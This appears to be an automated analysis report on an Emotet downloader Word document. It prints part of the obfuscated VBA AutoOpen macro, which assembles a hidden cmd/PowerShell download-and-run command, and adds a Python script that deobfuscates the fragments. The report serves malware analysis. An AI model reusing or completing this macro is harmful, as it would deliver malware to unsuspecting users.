Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
ClamAV identifies the sample with the signature 'Doc.Downloader.Emotet-6826430-0', i.e. a Word document acting as a downloader for the Emotet family. The recovered VBA project contains an AutoOpen subroutine, which Word runs as soon as the document is opened with macros enabled, so the only user interaction needed is clicking through the macro warning. AutoOpen builds a command string from KeyString() and the return values of several helper functions (XzuRhrw and others) and hands it to dMNdIZlc, which executes it with Shell (`Shell@ pEEQlpihAs, CInt(msoBarTypeNormal)`; msoBarTypeNormal is 0, which as a Shell window style is vbHide, so the command runs without a visible window). The many Dim/Left/Mid/MidB assignments surrounding these calls are junk that is never read and only pads the macro. The string fragments visible in XzuRhrw are stuffed with cmd.exe caret (^) escape characters; once the carets are removed and the text is reversed they read as PowerShell ('DownloadFile', 'Invoke-Item', 'try{', 'catch{}}'), while the forward-reading 'md /V:O/C"' and 'et L6cf=' pieces form a cmd /V /C "set ..." wrapper. This is consistent with a downloader that fetches and runs a secondary payload. No download URL appears in the visible part of the macro preview; the only extracted URL is an Office XML namespace, so the payload location has to be recovered from the full macros.bas.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6826430-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826430-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): the VBA project defines an AutoOpen subroutine, which Word executes automatically when the document is opened with macros enabled
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule text is partly contradicted by the findings above: a VBA project was recovered (OLE_VBA_MACROS, and macros.bas under Extracted artifacts), so treat this hit as a second match on the same AutoOpen name rather than as independent evidence.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into documents, not a download location; do not use it as a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12532 bytes | bef3386ad096127f711363ce787e007b8eb1617cf39dad6b0693d1bf3f3f6c09 |
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "iizjCRDRuNsVA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim MHFnZ(2)
MHFnZ(0) = Left("wZfvzKsw", 484)
MHFnZ(1) = Mid("Dboiscm", 481, 162)
Dim IAHmvO(2)
IAHmvO(0) = MidB("cUPIQi", 996, 290)
IAHmvO(1) = Right("uufbE", 228)
Dim TjjXN(1)
TjjXN(0) = MidB("EzNaa", 820, 569)
Dim jUaok(1)
jUaok(0) = Mid("cjHCivEw", 444, 128)
Dim jlwKh(1)
jlwKh(0) = Mid("UsvSOL", 697, 399)
Dim vwXZi(1)
vwXZi(0) = Mid("zTSvv", 551, 813)
Dim zciihY(2)
zciihY(0) = MidB("frzFRI", 620, 219)
zciihY(1) = Left("hPGnLRoz", 516)
dMNdIZlc (KeyString(6 + 3 + 9 + 11 + 38) + XzuRhrw + IlCbz + zAnMa + XKWczi + QpOzmQzA + fIMRSkQDkPHW)
Dim hXVMz(2)
hXVMz(0) = Left("LuktwQMi", 565)
hXVMz(1) = Left("MuBQB", 199)
Dim OsTjo(2)
OsTjo(0) = Left("DbwSPCi", 122)
OsTjo(1) = MidB("rjKjAkz", 516, 889)
Dim jwqcjQ(1)
jwqcjQ(0) = Right("ZhkAfG", 689)
End Sub
Function dMNdIZlc(pEEQlpihAs As String)
Dim Xjcizz(2)
Xjcizz(0) = MidB("bjaNomz", 276, 954)
Xjcizz(1) = Mid("FCiljzhd", 631, 577)
Dim nVlvSw(2)
nVlvSw(0) = MidB("Xhljs", 657, 46)
nVlvSw(1) = Left("zcjDDi", 211)
Shell@ pEEQlpihAs, CInt(msoBarTypeNormal)
Dim vUzmKD(2)
vUzmKD(0) = MidB("ULShzbW", 179, 318)
vUzmKD(1) = Right("uwoDvjE", 726)
Dim MiRFOd(1)
MiRFOd(0) = MidB("pqqku", 18, 321)
Dim HcBJX(1)
HcBJX(0) = Right("WXZjJFM", 149)
Dim LNTkn(1)
LNTkn(0) = Mid("ZfbRfSU", 609, 393)
End Function
Attribute VB_Name = "wpULVtBFvTmAKp"
Function XzuRhrw()
Dim vQKEwr(1)
vQKEwr(0) = MidB("dDmSkhE", 421, 648)
Dim zqSdz(1)
zqSdz(0) = Right("pTCJz", 633)
Dim waAsXO(2)
waAsXO(0) = Mid("tiuzhJ", 918, 331)
waAsXO(1) = MidB("CSAaiR", 478, 701)
nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s"
Dim aTAjiw(2)
aTAjiw(0) = Mid("vfsfA", 341, 704)
aTAjiw(1) = Left("EwYAkYdR", 323)
NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ "
Dim lUIXjG(1)
lUIXjG(0) = Mid("CIAiF", 936, 39)
Dim ORTSBV(1)
ORTSBV(0) = MidB("zLdLizJY", 871, 549)
Dim ocdWkC(1)
ocdWkC(0) = MidB("HkVwO", 542, 830)
Dim wtrviW(2)
wtrviW(0) = Mid("OjXBKil", 333, 998)
wtrviW(1) = Left("XclQZ", 201)
YRsBNrjwjw = "^ ^" + " ^" + " " + " ^ " + " ^ "
Dim HKZJTc(2)
HKZJTc(0) = Right("jJNWzFQW", 679)
HKZJTc(1) = Right("pnAWPGm", 468)
Dim WEwclc(1)
WEwclc(0) = Left("VnnXW", 719)
HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^"
Dim sEnlP(1)
sEnlP(0) = MidB("wCjZkT", 888, 141)
Dim dcnljL(2)
dcnljL(0) = MidB("OkCmS", 495, 464)
dcnljL(1) = MidB("OPdAFQEs", 638, 967)
mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J"
Dim ofJGw(1)
ofJGw(0) = Right("FQiiV", 112)
Dim QqLIQ(1)
QqLIQ(0) = Mid("wTwinqw", 38, 202)
Dim DUawZr(2)
DUawZr(0) = MidB("vDHhZk", 128, 760)
DUawZr(1) = Left("GQKwRXD", 531)
Dim wdRDr(1)
wdRDr(0) = Left("wIYUUcJ", 303)
OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^"
Dim OzsJc(2)
OzsJc(0) = MidB("nSmszWjU", 410, 760)
OzsJc(1) = MidB("FhIJdBL", 322, 273)
Dim tYzpGW(1)
tYzpGW(0) = MidB("vTijivJh", 299, 297)
Dim fbLvLr(2)
fbLvLr(0) = MidB("VibTH", 251, 68)
fbLvLr(1) = Right("wNWcA", 174)
Dim isirv(2)
isirv(0) = Left("RvlwhsO", 245)
isirv(1) = MidB("ZNuHPMXZ", 393, 43)
SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr"
Dim HSOpZ(1)
HSOpZ(0) = MidB("EuoMlJ", 438, 248)
Dim hstbl(2)
hstbl(0) = Mid("biLAk", 154, 312)
hstbl(1) = Left("QoRhskw", 828)
Dim DSpQE(1)
DSpQE(0) = Mid("ForhiBfr", 894, 817)
Dim Awlvj(2)
Awlvj(0) = Mid("zDKjCOob", 224, 952)
Awlvj(1) = Right("qVSEkTU", 144)
Dim jjWkAh(2)
jjWkAh(0) = Left("FQVmcNqY", 913)
jjWkAh(1) = Mid("fdZowiMw", 944, 829)
zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^"
... (truncated)
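The fragment-building pattern in XzuRhrw can be unpicked mechanically. The following is an added example, not part of the analyzer report or of the sample: a Python script that parses `name = "..." + "..." + ChrW(n + m)` assignments copied from the macros.bas preview above (the sample input is constructed from those lines plus two junk lines of the surrounding kind), concatenates the pieces, removes cmd.exe caret escapes, and shows each value reversed. It assumes that the right-hand sides contain only string literals and ChrW() with additive integer arithmetic (true for the visible lines; VBA doubled-quote escapes and other functions are not handled) and reverses each fragment on its own, because the order in which the macro joins them into the final command is not shown in the truncated preview.

```python
import re

# Constructed sample input: assignment lines copied from the macros.bas preview in
# this report, plus two junk lines of the kind that surround them, to show that
# only string-building assignments are picked up.
SAMPLE_VBA = r'''
Dim waAsXO(2)
waAsXO(0) = Mid("tiuzhJ", 918, 331)
nJKthBOC = "m" + "d /V" + "^:^" + "O/C" + ChrW(5 + 2 + 1 + 1 + 25) + "^s"
NahjjA = "^e" + "t" + " L" + "^6c^" + "f" + "= ^ " + "^ ^ " + "^ "
YRsBNrjwjw = "^ ^" + " ^" + " " + " ^ " + " ^ "
HZhoib = "^ }}" + "{^hc" + "t^ac" + "^" + "}" + "^;k^"
mjLkUjwL = "ae" + "r" + "b" + "^;^" + "m" + "G" + "J"
OCVRJjqSSVX = "$^ " + "^m^e" + "t^" + "I^" + "-" + "ekov" + "nI;)" + "m^G" + "J" + "^$" + "^ " + "^,q^" + "PD^"
SIBsWiuAAfL = "$(^e" + "li^F" + "daol" + "n" + "wo^D" + "." + "v" + "^a" + "N$^{" + "yr"
zwVAkKz = "^" + "t" + "^{)^" + "T^p" + "M$^"
'''

# "name = <expr>" where name is a plain identifier (array elements such as
# waAsXO(0) are deliberately excluded).
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# A string literal or a ChrW(...) call; these are the only building blocks handled.
TOKEN_RE = re.compile(r'"([^"]*)"|ChrW\(([^)]*)\)')


def eval_chrw(expr):
    """ChrW(n + m + ...) with only additive integer arithmetic (assumption)."""
    if not re.fullmatch(r'[\d\s+]+', expr):
        raise ValueError(f'unsupported ChrW argument: {expr!r}')
    return chr(sum(int(n) for n in re.findall(r'\d+', expr)))


def is_string_expr(rhs):
    """True if the right-hand side is only literals/ChrW() joined with '+'."""
    leftover = TOKEN_RE.sub('', rhs).replace('+', '').strip()
    return leftover == '' and TOKEN_RE.search(rhs) is not None


def resolve_rhs(rhs):
    """Concatenate the literal and ChrW() pieces left to right, as VBA would."""
    pieces = []
    for literal, chrw_arg in TOKEN_RE.findall(rhs):
        pieces.append(eval_chrw(chrw_arg) if chrw_arg else literal)
    return ''.join(pieces)


def strip_carets(text):
    """cmd.exe treats an unquoted ^ as an escape character and drops it."""
    return text.replace('^', '')


def deobfuscate(vba_source):
    """Map each string-building variable to its raw, caret-stripped and reversed forms."""
    result = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m or not is_string_expr(m.group(2)):
            continue
        raw = resolve_rhs(m.group(2))
        plain = strip_carets(raw)
        result[m.group(1)] = {'raw': raw, 'forward': plain, 'reversed': plain[::-1]}
    return result


if __name__ == '__main__':
    for name, forms in deobfuscate(SAMPLE_VBA).items():
        print(f'{name:12} forward : {forms["forward"]!r}')
        print(f'{"":12} reversed: {forms["reversed"]!r}')
```

The forward forms of nJKthBOC and NahjjA give the cmd.exe wrapper (`md /V:O/C"` and `et L6cf=`, each missing the leading character that the macro supplies elsewhere), and the reversed forms of the remaining fragments give the PowerShell pieces (`ry{$Nav.DownloadFile($`, `DPq, $JGm);Invoke-Item $`, `k;}catch{}}`). To finish the job on the real sample, run the same parser over the full macros.bas and join the fragments in the order the macro concatenates them.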